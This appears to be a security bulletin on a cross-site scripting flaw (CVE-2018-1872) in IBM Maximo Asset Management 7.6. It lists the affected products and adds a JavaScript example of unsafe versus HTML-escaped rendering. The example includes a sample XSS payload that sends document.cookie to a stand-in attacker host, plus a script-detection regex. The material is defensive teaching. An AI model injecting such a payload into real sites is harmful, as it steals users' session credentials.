Medium Severity

IBM Security Bulletin: IBM Maximo Asset Management is vulnerable to cross-site scripting (CVE-2018-1872)


IBM Maximo Asset Management is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI, altering its intended functionality and potentially leading to credential disclosure within a trusted session.
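The bulletin does not publish the affected field or page, so the following is an added, generic illustration of the vulnerability class it describes, not Maximo code and not the reported issue. The table cell, the field name and the payload are constructed here for the example. It shows why a user-entered value rendered without output encoding lets script run in another user's authenticated session, and how HTML-encoding the value at the point of rendering removes that ability.

```javascript
// Added example (not IBM's code): stored cross-site scripting in a web UI that
// renders a user-controlled field, beside the hardened form.

// Naive rendering: the user-controlled text is concatenated straight into HTML.
function renderUnsafe(description) {
  return `<td class="description">${description}</td>`;
}

// Hardened rendering: encode the characters that can end a text node or attribute.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(text).replace(/[&<>"']/g, (c) => map[c]);
}

function renderSafe(description) {
  return `<td class="description">${escapeHtml(description)}</td>`;
}

// Crude reviewer check used only by this example: does the rendered fragment still
// contain a live <script> element or an inline event-handler attribute?
function containsActiveScript(html) {
  return /<script\b|\son\w+\s*=/i.test(html);
}

// Constructed sample value: a record description carrying a script that would run
// in the viewing user's session and exfiltrate their cookie. The hostname is made up.
const payload =
  '<script>fetch("https://attacker.example/c?" + document.cookie)</script>';

// Returns whether each renderer leaves the injected script active.
function demo() {
  return {
    unsafe: containsActiveScript(renderUnsafe(payload)),
    safe: containsActiveScript(renderSafe(payload)),
  };
}

module.exports = { renderUnsafe, renderSafe, escapeHtml, containsActiveScript, demo };
```

The encoding has to happen where the value is written into HTML, not on input: a value that is safe in a text node is still unsafe inside a `javascript:` URL or an unquoted attribute, so each output context needs its own encoder.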

CVE(s): CVE-2018-1872

Affected product(s) and affected version(s):

This vulnerability affects the following versions of the IBM Maximo Asset Management core product, and all other IBM Maximo Industry Solution and IBM Control Desk products, regardless of their own version, if they are currently installed on top of an affected IBM Maximo Asset Management. *

Maximo Asset Management core product affected versions:
Maximo Asset Management 7.6

Industry Solutions products affected if using an affected core version:
Maximo for Aviation
Maximo for Life Sciences
Maximo for Nuclear Power
Maximo for Oil and Gas
Maximo for Transportation
Maximo for Utilities

IBM Control Desk products affected if using an affected core version:
SmartCloud Control Desk
IBM Control Desk
Tivoli Integration Composer

* To determine the core product version, log in and view System Information. The core product version is the “Tivoli’s process automation engine” version. Please consult the Product Coexistence Matrix for a list of supported product combinations.

Refer to the following reference URLs for remediation and additional vulnerability details:
Source Bulletin: https://www-01.ibm.com/support/docview.wss?uid=ibm10737461
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/151330
